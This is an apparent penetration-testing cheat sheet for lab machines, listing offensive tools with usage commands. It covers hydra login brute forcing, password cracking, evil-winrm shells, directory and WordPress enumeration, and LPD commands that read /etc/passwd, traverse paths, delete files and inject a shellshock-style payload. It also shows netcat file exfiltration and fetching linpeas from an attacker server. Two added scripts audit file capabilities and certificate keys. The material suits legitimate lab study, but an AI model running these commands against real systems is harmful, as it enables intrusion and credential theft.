adb (Android Debug Bridge)
#adb connect <IP>:5555
#adb shell
apktool
tool for reverse engineering android apk files
#apktool d -f -r filename.apk
base64 decode
Decode base64 back to plaintext (add trailing "=" padding if the string was stripped of it)
#echo "<base64 string>" | base64 --decode
creating base64
#echo -n "string" | base64    (-n keeps echo's newline out of the encoded data)
there are online resources as well
base64encode.org
BurpSuite
verbose details here link
DIRB
Web content scanner that looks for existing (and/or hidden) web objects. Its primary function is launching a dictionary-based attack against a web server and analyzing the responses
Usage: #dirb http://zyz.htb -r -z 10
Dirbuster
GUI for Dirb. Very slick. Especially useful for
Usage: Open dirbuster application
-set number of threads
-set target including http:// or https://
-set wordlist
-set file extension
davtest
tool that tests whether files can be uploaded to (and executed on) a WebDAV-enabled web server
Usage: #davtest -url http://<ip>
evil-winrm
Windows Remote Management (WinRM) shell
#gem install evil-winrm
#evil-winrm -i <IP> -u <username> -p '<password>'
available commands when successful
upload/download/services/menu
use evil-winrm with acquired certificate and private key
#evil-winrm -i <IP> -S -c cert.crt -k priv.key -p -u
you will have to enter the password for the key (likely you have identified it or made your own)
fcrackzip
a free, fast zip password cracker
Usage: #fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt <filename>.zip
-u = try to unzip with each candidate (weeds out false positives)
-D = dictionary mode
-p = with -D, the wordlist file to read passwords from
finger-user-enum.pl
enumerating users through the finger service
Usage: #./finger-user-enum.pl -U /opt/SecLists/Usernames/Names/names.txt -t 10.10.10.76
getcap
Examine file capabilities. Displays the name and capabilities of each specified file
Usage: #getcap -r /
Usage (errors from unreadable paths suppressed): #getcap -r / 2>/dev/null
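Added example, not from this page: a small audit helper that reads the output of "getcap -r / 2>/dev/null" and reports binaries carrying capabilities that amount to root-equivalent privilege, so they can be reviewed or stripped with "setcap -r". The sample getcap lines and the risky-capability list are constructed for this example.

```shell
#!/bin/sh
# Added example (not from the original page): flag root-equivalent file
# capabilities in getcap output. Sample lines and RISKY list are constructed.
set -u

# Capabilities that deserve a review ticket when found on an arbitrary binary
# (assumed list for this example; see capabilities(7) for the full semantics).
RISKY="cap_setuid cap_setgid cap_sys_admin cap_sys_ptrace cap_dac_override cap_dac_read_search cap_sys_module cap_chown cap_fowner"

# getcap prints "path = caps" (older libcap) or "path caps" (newer libcap).
# Paths containing spaces are not handled, which matches real getcap usage.
caps_of() {
  case "$1" in
    *" = "*) printf '%s\n' "${1##* = }" ;;
    *)       printf '%s\n' "${1##* }" ;;
  esac
}

path_of() {
  case "$1" in
    *" = "*) printf '%s\n' "${1%% = *}" ;;
    *)       printf '%s\n' "${1% *}" ;;
  esac
}

# Reads getcap lines on stdin, prints "path capability" for each risky one.
# Returns 0 if anything was flagged, 1 if the listing is clean.
flag_risky() {
  found=1
  while IFS= read -r line; do
    [ -n "$line" ] || continue
    p="$(path_of "$line")"
    c="$(caps_of "$line")"
    # "cap_a,cap_b+ep" or "cap_a=ep": drop the flag suffix, split on commas
    names="$(printf '%s' "$c" | sed 's/[+=].*//' | tr ',' ' ')"
    for n in $names; do
      case " $RISKY " in
        *" $n "*) printf '%s %s\n' "$p" "$n"; found=0 ;;
      esac
    done
  done
  return $found
}

# Constructed sample of getcap output, mixing both output formats.
SAMPLE_GETCAP='/usr/bin/ping = cap_net_raw+ep
/usr/bin/python3.8 = cap_setuid+ep
/usr/bin/vim.basic cap_dac_override,cap_sys_admin+ep'
printf '%s\n' "$SAMPLE_GETCAP" | flag_risky || echo "no risky capabilities found"
```

On a real host, pipe "getcap -r / 2>/dev/null | flag_risky" instead of the constructed sample.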
gobuster
similar to DIRB, a directory brute forcer
you will need to install it
#apt-get install gobuster
usage:
#gobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/common.txt
"common.txt" at the location you see here was a special download, you can use whatever wordlist you want.
hydra
brute forcing tool
basic usage
#hydra -l <username> -P /usr/share/wordlists/rockyou.txt <IP> -t 4 <service>
Brute force login on a website (-s takes the port number; ^USER^ and ^PASS^ are replaced from the wordlists; the last field is the string that marks a failed login)
#hydra -s <port> -V -L <user_wordlist> -P <pass_wordlist> admin.cronos.htb http-post-form "/:username=^USER^&password=^PASS^:invalid"
impacket:
Installation:
#sudo apt-get install python3-pip
#sudo git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket
#cd /opt/impacket
#sudo python3 ./setup.py install
John the Ripper
Basic usage
#john --wordlist=/usr/share/wordlists/rockyou.txt <file_name>
get a crackable hash from a .pfx file
#pfx2john file.pfx > [output_file_name]
then go back to basic JtR usage and crack the hash
kubeletctl
Kubeletctl is a command line tool that implements the kubelet's API.
The kubelet typically listens on port 10250
can be discovered through https://<IP>:10250
github repo
another good resource
installation:
#wget https://github.com/cyberark/kubeletctl/releases/download/v1.7/kubeletctl_linux_amd64 && chmod a+x ./kubeletctl_linux_amd64 && mv ./kubeletctl_linux_amd64 /usr/local/bin/kubeletctl
check pods
#kubeletctl pods -s <IP>
check running pods
#kubeletctl runningpods -s <IP>
ldapsearch
it is an LDAP search tool (great resource)
check for null credentials
#ldapsearch -x -h <IP> -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
lpdprint.py
Line Printer Daemon (LPD) runs on port 515/TCP. It is possible to send files, get files and even navigate the OS
basic usage
#lpdprint.py hostname filename
#lpdtest.py hostname get /etc/passwd
#lpdtest.py hostname put ../../etc/passwd
#lpdtest.py hostname rm /some/file/on/printer
#lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
#lpdtest.py hostname mail lpdtest@mailhost.local
netcat
swiss army knife of the internet
basic file transfer
receiver (works with images/zips/etc.)
#nc -nlvp 4444 > file.txt
sender
#nc <receiver_IP> 4444 < stuff_you_want_to_send.txt
nmblookup
NetBIOS over TCP/IP client used to lookup NetBIOS names
#nmblookup -A <IP>
nuclei
Nuclei is a vulnerability scanning tool developed by projectdiscovery that helps find security issues automatically based on simple YAML-based templates. This tool is highly customizable and helps in identifying vulnerabilities by scanning numerous protocols such as HTTP, DNS, TCP etc.
INITIAL SETUP
#apt-get install nuclei
#nuclei -u http://<IP> 130
openssl
cryptography toolkit implementing the SSL v2/v3 and TLS v1 network protocols and related crypto standards (reference)
(see also on this page ssh2john)
Extract private key from pfx file
#openssl pkcs12 -in [yourfile.pfx] -nocerts -out [priv.key]
Extract the certificate
#openssl pkcs12 -in [yourfile.pfx] -clcerts -nokeys -out [cert.crt]
Decrypt private key
#openssl rsa -in [drlive.key] -out [decrypt_priv.key]
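Added example, not from this page: the three openssl steps above run non-interactively on a constructed demo .pfx, followed by a check that the extracted key really belongs to the extracted certificate (a mismatched pair is a common reason a later evil-winrm -c/-k login fails). Assumes the openssl CLI is on PATH; the file names and the "pfxsecret" / "tmppass" passwords are constructed.

```shell
#!/bin/sh
# Added example (not from the original page): extract key and cert from a
# PKCS#12 bundle and verify they are a matching pair. Demo pfx is constructed.
set -eu
WORK="$(mktemp -d)"
trap 'rm -rf "$WORK"' EXIT

# Build a throwaway .pfx so the script runs offline.
make_demo_pfx() {
  openssl req -x509 -newkey rsa:2048 -nodes -days 1 -subj "/CN=demo.local" \
    -keyout "$WORK/demo.key" -out "$WORK/demo.crt" >/dev/null 2>&1
  openssl pkcs12 -export -inkey "$WORK/demo.key" -in "$WORK/demo.crt" \
    -out "$WORK/demo.pfx" -passout pass:pfxsecret
}

# The page's three steps. $1 = pfx, $2 = pfx password, $3 = passphrase for the
# intermediate key that -nocerts writes (it is still encrypted at that point).
extract_pair() {
  openssl pkcs12 -in "$1" -nocerts -out "$WORK/priv.key" \
    -passin "pass:$2" -passout "pass:$3"
  openssl pkcs12 -in "$1" -clcerts -nokeys -out "$WORK/cert.crt" -passin "pass:$2"
  openssl rsa -in "$WORK/priv.key" -passin "pass:$3" -out "$WORK/decrypt_priv.key"
}

# Returns 0 when the public key inside the cert equals the public key derived
# from the private key, i.e. the two files belong together.
pair_matches() {
  c="$(openssl x509 -in "$1" -pubkey -noout | openssl sha256)"
  k="$(openssl pkey -in "$2" -pubout | openssl sha256)"
  [ "$c" = "$k" ]
}

make_demo_pfx
extract_pair "$WORK/demo.pfx" pfxsecret tmppass
if pair_matches "$WORK/cert.crt" "$WORK/decrypt_priv.key"; then
  echo "key and certificate match"
else
  echo "MISMATCH: this key does not belong to this certificate" >&2
fi
```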
Python Webserver
An amazingly quick way to launch a web server so you can transfer files to the target fast!
Run the command below from the "attack" machine, from the directory that contains the file you want to serve (linpeas.sh, winpeas.sh, etc.)
#python3 -m http.server 5050
Then fetch the file from the target
#wget http://<attack_ip>:5050/linpeas.sh
pureFTPd
Used for transferring data between kali and target
INITIAL SETUP
On Kali
#apt-get install pure-ftpd
create the ftp group and user
#groupadd ftpgroup
#useradd -g ftpgroup -d /dev/null -s /etc ftpuser
#pure-pw useradd jonny -u ftpuser -d /ftphome
#pure-pw mkdb
enable the PureDB authentication backend (inside /etc/pure-ftpd/auth)
#cd /etc/pure-ftpd/auth/
#ln -s ../conf/PureDB 60pdb
create the ftp home directory and hand it to the ftp user
#mkdir -p /ftphome
#chown -R ftpuser:ftpgroup /ftphome/
#systemctl restart pure-ftpd
Check Status
#systemctl status pure-ftpd
USAGE
From target
#ftp <kali IP>
login and download
rpcinfo
typically the service rpcbind is found on port 111
tool makes an RPC call to an RPC server and reports what it finds
basic usage
#rpcinfo <IP>
RSACTFTOOL
cracking weak RSA with a provided .pub key (tries known attacks against the public key and, if one succeeds, decrypts the ciphertext file)
#RsaCtfTool.py --publickey <key.pub> --uncipherfile <flag.enc>
rpcclient
Samba client for MS-RPC over SMB (typically ports 445/139)
tool for querying a Windows/Samba host over MS-RPC (users, groups, shares, domain info)
basic usage --> check for null sessions
#rpcclient -U "" -N <IP>
SecLists
this is a community-maintained collection of a TON of wordlists (usernames, passwords, URLs, fuzzing payloads and more). It's insane
download like so:
#wget -c https://github.com/danielmiessler/SecLists/archive/master.zip -O SecList.zip
#unzip SecList.zip
#rm -f SecList.zip
sherlock
Tool for enumerating social media for user names
You need to install it
Usage: #sherlock <username>
(it returns a lot!)
SimpleHTTPServer (Python 2)
Used for file transfers between attacker and target. Typically there is something on the target you want to plant
Usage: Attacker Machine: #python -m SimpleHTTPServer <port #>
Usage: Target: #wget http://<attackerIP>:<port>/<desired_file>
ssh2john
you have acquired an encrypted SSH private key (e.g. id_rsa). You need to convert this file to a hash
#ssh2john <filename that is rsa> > hash_output
#john --wordlist=/usr/share/wordlists/rockyou.txt hash_output
steghide
basic embedding:
#steghide embed -ef secretphrase.txt -cf image.jpeg
basic extraction:
#steghide extract -sf image.jpeg
enter the passphrase when prompted
the extracted file is saved under the name it was embedded with (here "pass.txt")
wafw00f
Identify and fingerprint Web Application Firewall products
sends a normal HTTP request and analyses the response; this identifies a number of WAF solutions. If that is not successful, it sends a number of additional HTTP requests and uses simple logic to deduce which WAF it is
basic usage:
#wafw00f http://<IP>
wpscan
scanner used for gathering information (vulns) on WordPress sites
basic usage
#wpscan --url http://backdoor.htb
enumerate users
#wpscan --url http://backdoor.htb --enumerate u
deeper scan
#wpscan --url http://<IP> -e ap,t,tt,u
ap = all plugins
t = themes
tt = timthumbs
u = users
Brute force plugin discovery
#wpscan --url http://backdoor.htb --plugins-detection aggressive -e ap
zipinfo
Gives you the properties of the zip file
basic usage:
#zipinfo -v <filename>.zip